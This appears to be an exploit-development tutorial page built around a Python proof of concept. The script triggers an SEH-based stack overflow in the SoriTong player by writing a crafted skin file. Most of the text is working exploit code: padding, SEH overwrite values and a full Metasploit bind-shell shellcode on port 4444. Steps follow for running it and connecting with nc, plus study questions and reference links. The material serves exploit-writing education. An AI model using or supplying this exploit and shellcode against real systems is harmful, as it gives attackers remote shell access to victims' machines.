exploit - stack overflow with seh

Demo Prog:

---

Exploit Code

#!/usr/bin/env python
# -*- coding: utf8 -*-

# Author: Nixawk

fpath = "C:\Program Files\SoriTong\Skin\Default\UI.txt"

with open(fpath, "w") as f:
    junk = "A" * 584
    nseh = "\xEB\x06\x90\x90"  # next pointer
    pseh = "\x8C\xDD\x01\x10"  # seh callback: !mona seh - 0x1001dd8c

    # bad chars: 00 09 0A 0D

    # windows/shell_bind_tcp - 355 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, 
    # EXITFUNC=seh, InitialAutoRunScript=, AutoRunScript=
    buf=  "\x90" * 32
    buf+= "\xd9\xcf\xbd\xa5\x08\x25\xa6\xd9\x74\x24\xf4\x5e\x29"
    buf+= "\xc9\xb1\x53\x83\xc6\x04\x31\x6e\x13\x03\xcb\x1b\xc7"
    buf+= "\x53\xef\xf4\x85\x9c\x0f\x05\xea\x15\xea\x34\x2a\x41"
    buf+= "\x7f\x66\x9a\x01\x2d\x8b\x51\x47\xc5\x18\x17\x40\xea"
    buf+= "\xa9\x92\xb6\xc5\x2a\x8e\x8b\x44\xa9\xcd\xdf\xa6\x90"
    buf+= "\x1d\x12\xa7\xd5\x40\xdf\xf5\x8e\x0f\x72\xe9\xbb\x5a"
    buf+= "\x4f\x82\xf0\x4b\xd7\x77\x40\x6d\xf6\x26\xda\x34\xd8"
    buf+= "\xc9\x0f\x4d\x51\xd1\x4c\x68\x2b\x6a\xa6\x06\xaa\xba"
    buf+= "\xf6\xe7\x01\x83\x36\x1a\x5b\xc4\xf1\xc5\x2e\x3c\x02"
    buf+= "\x7b\x29\xfb\x78\xa7\xbc\x1f\xda\x2c\x66\xfb\xda\xe1"
    buf+= "\xf1\x88\xd1\x4e\x75\xd6\xf5\x51\x5a\x6d\x01\xd9\x5d"
    buf+= "\xa1\x83\x99\x79\x65\xcf\x7a\xe3\x3c\xb5\x2d\x1c\x5e"
    buf+= "\x16\x91\xb8\x15\xbb\xc6\xb0\x74\xd4\x2b\xf9\x86\x24"
    buf+= "\x24\x8a\xf5\x16\xeb\x20\x91\x1a\x64\xef\x66\x5c\x5f"
    buf+= "\x57\xf8\xa3\x60\xa8\xd1\x67\x34\xf8\x49\x41\x35\x93"
    buf+= "\x89\x6e\xe0\x0e\x81\xc9\x5b\x2d\x6c\xa9\x0b\xf1\xde"
    buf+= "\x42\x46\xfe\x01\x72\x69\xd4\x2a\x1b\x94\xd7\x45\x80"
    buf+= "\x11\x31\x0f\x28\x74\xe9\xa7\x8a\xa3\x22\x50\xf4\x81"
    buf+= "\x1a\xf6\xbd\xc3\x9d\xf9\x3d\xc6\x89\x6d\xb6\x05\x0e"
    buf+= "\x8c\xc9\x03\x26\xd9\x5e\xd9\xa7\xa8\xff\xde\xed\x5a"
    buf+= "\x63\x4c\x6a\x9a\xea\x6d\x25\xcd\xbb\x40\x3c\x9b\x51"
    buf+= "\xfa\x96\xb9\xab\x9a\xd1\x79\x70\x5f\xdf\x80\xf5\xdb"
    buf+= "\xfb\x92\xc3\xe4\x47\xc6\x9b\xb2\x11\xb0\x5d\x6d\xd0"
    buf+= "\x6a\x34\xc2\xba\xfa\xc1\x28\x7d\x7c\xce\x64\x0b\x60"
    buf+= "\x7f\xd1\x4a\x9f\xb0\xb5\x5a\xd8\xac\x25\xa4\x33\x75"
    buf+= "\x5b\x54\x89\x60\xcc\xcf\x78\xc9\x90\xef\x57\x0e\xad"
    buf+= "\x73\x5d\xef\x4a\x6b\x14\xea\x17\x2b\xc5\x86\x08\xde"
    buf+= "\xe9\x35\x28\xcb"

    nops = "\x90" * (5000 - 588 - len(buf) - len(nseh) - len(pseh))
    payload = junk + nseh + pseh + buf + nops
    f.write(payload)

How to exploit SoriTong ?

1. python2 exploit_soritong.py
2. cmd.exe /c SoriTong.exe (double click to execute it)
3. nc -v 127.0.0.1 4444

---

Questions:

1. How to find address to overwrite pointer of seh ?
2. How to avoid bad chars ?
3. Could you exploit prog stack with seh ?
4. How to use Immunity Debugger mona plugin ?

---

References:
1. https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
2. https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/